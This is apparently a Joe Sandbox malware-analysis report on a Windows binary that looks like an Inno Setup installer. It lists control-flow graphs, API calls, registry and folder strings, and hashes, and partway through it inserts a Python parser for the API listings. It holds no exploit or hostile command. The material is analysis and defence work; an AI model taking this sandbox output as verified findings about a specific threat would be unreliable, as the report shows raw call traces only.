                                                              control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1088 4929bc-4929c9 call 403684 1079->1088 1089 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1089 1080->1060 1100 492a18-492a25 call 403684 1088->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1088->1101 1089->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1126 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1126 1127 492aa0-492aad call 403684 1113->1127 1114->1060 1126->1060 1139 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1127->1139 1140 492af4-492b01 call 403684 1127->1140 1139->1060 1152 492b48-492b55 call 403684 1140->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1140->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1182 492b87-492b95 GetLastError call 447278 1165->1182 1183 492b77-492b85 call 447278 1165->1183 1207 492c21-492c2c call 4470d0 1175->1207 1208 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1208 1188 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1188 1189 492c66-492c73 call 403684 1176->1189 1194 492b9a-492ba5 call 447278 1182->1194 1183->1194 1188->1060 1204 492c98-492ca5 call 403684 1189->1204 1205 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1189->1205 1194->1060 1215 492cdb-492ce8 call 403684 1204->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1204->1216 1205->1060 1207->1060 1208->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                              • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FindSleepWindow
                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                              • API String ID: 3078808852-3310373309
                                                              • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                              • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                              • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                              • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1631 483b4d-483b52 1626->1631 1629 483b23-483b27 1627->1629 1630 483b34-483b3b 1627->1630 1633 483b29-483b46 1629->1633 1634 483b3d-483b44 1629->1634 1630->1631 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1631 1634->1631 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                              • API String ID: 2230631259-2623177817
                                                              • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                              • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                              • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                              • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                              Control-flow Graph (rendered as an image in the original report; blocks are coloured Executed / Not Executed, edges not reproduced here)

                                                              • Basic blocks: 468d88-468dc0 (entry; call 47c26c), 468dc6-468dd6 (call 478e24), 468ddb-468e20 (call 4078f4, 403738, 42de1c), 468e25-468e27, 468e2d-468e42, 468e44-468e52 (call 42dd4c), 468e57-468e5e, 468e60-468e82 (call 42dd4c, 42dd64), 468e84, 468e8b-468e92, 468e94-468eb9 (call 42dd4c x2), 468ebb-468ec4 (call 4314f8), 468ec9-468edb (call 42dd4c), 468edd-468ee6 (call 4314f8), 468eeb-468ef2, 468ef4-468f06 (call 42dd4c), 468f08-468f11 (call 4314f8), 468f16-468f28 (call 42dd4c), 468f2a-468f33 (call 4314f8), 468f38-468f3f, 468f41-468f75 (call 42dd4c x3), 468f7a-468f90 (RegCloseKey), 468f98-468f9c, 468fa2-468fbc (call 403420)
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                              Strings
                                                              • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                              • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                              • Inno Setup: Icon Group, xrefs: 00468E66
                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                              • Inno Setup: App Path, xrefs: 00468E4A
                                                              • %s\%s_is1, xrefs: 00468E05
                                                              • Inno Setup: Selected Components, xrefs: 00468EAA
                                                              • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                              • Inno Setup: User Info: Name, xrefs: 00468F47
                                                              • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                              • Inno Setup: Setup Type, xrefs: 00468E9A
                                                              • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                              • Inno Setup: No Icons, xrefs: 00468E73
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                              • API String ID: 47109696-1093091907
                                                              • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                              • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                              • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                              • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                              Control-flow Graph (rendered as an image in the original report; block listing not extracted)

                                                              APIs
                                                                • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                              • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                              • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                              • API String ID: 3771764029-544719455
                                                              • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                              • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                              • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                              • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                              Control-flow Graph (rendered as an image in the original report; blocks are coloured Executed / Not Executed, edges not reproduced here)

                                                              • Basic blocks: 423874-42387e (entry), 423884-4238a6 (call 41f3c4, GetClassInfoA), 4238a8-4238bf (RegisterClassA), 4238c1-4238d2 (call 408cbc, 40311c), 4238d7-4238e0 (GetSystemMetrics), 4238e2, 4238e5-4238ef (GetSystemMetrics), 4238f1, 4238f4-423950 (call 403738, 4062e8, 403400, 42364c, SetWindowLongA), 423952-423965 (call 424178, SendMessageA), 42396a-423998 (GetSystemMenu, DeleteMenu x2), 42399a-4239a2 (DeleteMenu), 4239a7-4239ab
                                                              APIs
                                                                • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                              • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                              • RegisterClassA.USER32(00499630), ref: 004238B7
                                                              • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                              • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                              • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                              • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                              • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                              • String ID: |6B
                                                              • API String ID: 183575631-3009739247
                                                              • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                              • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                              • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                              • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                              Control-flow Graph (rendered as an image in the original report; blocks are coloured Executed / Not Executed, edges not reproduced here)

                                                              • Basic blocks: 47ce78-47cece (entry; call 42c3fc, 4035c0, 47cb3c, 4525d8), 47ced0-47ced5 (call 453344), 47ceda-47cee9 (call 4525d8), 47ceeb-47cef1, 47cef3-47cef9, 47cefb-47cf01, 47cf03-47cf09, 47cf0b-47cf11, 47cf13-47cf1b (call 403494), 47cf20-47cf48 (call 42e394 x2), 47cf4a-47cf6a (call 4078f4, 453344), 47cf6f-47cf89 (GetProcAddress), 47cf8b-47cf90 (call 453344), 47cf95-47cfb2 (call 403400 x2)
                                                              APIs
                                                              • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                              • API String ID: 190572456-256906917
                                                              • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                              • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                              • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                              • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                              Control-flow Graph (rendered as an image in the original report; blocks are coloured Executed / Not Executed)

                                                              • Basic blocks: 40631c-406336 (entry; GetModuleHandleA, GetProcAddress), 406338, 40633f-40634c (GetProcAddress), 40634e, 406355-406362 (GetProcAddress), 406364-406366 (SetProcessDEPPolicy), 406368-406369
                                                              • Edges: 40631c->406338, 40631c->40633f, 406338->40633f, 40633f->406355, 40633f->40634e, 40634e->406355, 406355->406364, 406355->406368, 406364->406368
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                              • API String ID: 3256987805-3653653586
                                                              • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                              • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                              • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                              • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
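The API listings in these function records all share one line format: a bullet, an optional "Part of subcall function XXXX:" prefix, the API name, the module it was resolved from, the call-time argument values, and the "ref:" address of the call site. When a report has hundreds of such records, it is quicker to parse them than to read them. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in that format into records and pulls out the export names the binary resolves at run time through GetProcAddress, the registry keys opened by root hive, and whether SetProcessDEPPolicy was called with PROCESS_DEP_ENABLE. The sample lines are copied from the listings above; the ApiCall type, the function names and the HIVES table are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from the function listings in this report.
SAMPLE = r"""
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
"""

# One API line: "• [Part of subcall function ADDR: ]Api.MODULE(args), ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined root handles passed as the first argument of RegOpenKeyEx/RegCreateKeyEx
# (hypothetical table name; the values are the documented HKEY_* constants).
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple          # argument values exactly as printed, e.g. "00000000" or "?"
    ref: int             # address of the call site
    subcall: Optional[int]  # address of the subcall function, for "Part of subcall" lines


def parse_api_lines(text: str) -> list:
    """Turn the bullet lines of a function record into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" carry no call
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def resolved_exports(calls) -> list:
    """Export names resolved at run time via GetProcAddress, in listing order.
    The sandbox prints call-time stack values, so the name is the second argument;
    the first is the module handle, which is often 00000000 and is not mapped to a DLL here."""
    return [c.args[1] for c in calls if c.api == "GetProcAddress" and len(c.args) >= 2]


def registry_targets(calls) -> list:
    """(hive, subkey) pairs for registry opens/creates; the root handle is argument 0."""
    out = []
    for c in calls:
        if c.api.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and len(c.args) >= 2:
            try:
                hive = HIVES.get(int(c.args[0], 16), c.args[0])
            except ValueError:      # "?" means the sandbox could not recover the value
                hive = c.args[0]
            out.append((hive, c.args[1]))
    return out


def dep_enabled(calls) -> bool:
    """True if SetProcessDEPPolicy was called with PROCESS_DEP_ENABLE (1)."""
    return any(c.api == "SetProcessDEPPolicy" and c.args and c.args[0] == "00000001"
               for c in calls)


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print("resolved at run time:", resolved_exports(calls))
    print("registry targets:", registry_targets(calls))
    print("DEP enabled:", dep_enabled(calls))
```

The argument columns are call-time stack snapshots, not decoded prototypes, which is why a line such as GetProcAddress.KERNEL32(00000000,advapi32.dll) can show a DLL name where a function name is expected; the parser reports what is on the line and deliberately does not guess which DLL a handle belongs to.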
                                                              APIs
                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$Prop
                                                              • String ID: 3A$yA
                                                              • API String ID: 3887896539-3278460822
                                                              • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                              • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                              • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                              • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                              Control-flow Graph (rendered as an image in the original report; blocks are coloured Executed / Not Executed, edges not reproduced here)

                                                              • Basic blocks: 467180-46722a (entry; call 41461c, 41463c, 41461c, 41463c, SHGetFileInfo), 46722c-467233, 467235-46725a (ExtractIconA, call 4670c0), 46725f-46726a (call 478e04), 46726c-4672b1 (call 42c3fc, 40357c, 403738, ExtractIconA, call 4670c0), 4672b6, 4672bb-4672ce (call 47d33c), 4672d0-4672da (call 47d33c), 4672df-4672e3, 4672e5-467308 (call 403738, SHGetFileInfo), 46730a-467311, 467313-467338 (ExtractIconA, call 4670c0), 46733d-467371 (call 403400 x2)
                                                              APIs
                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
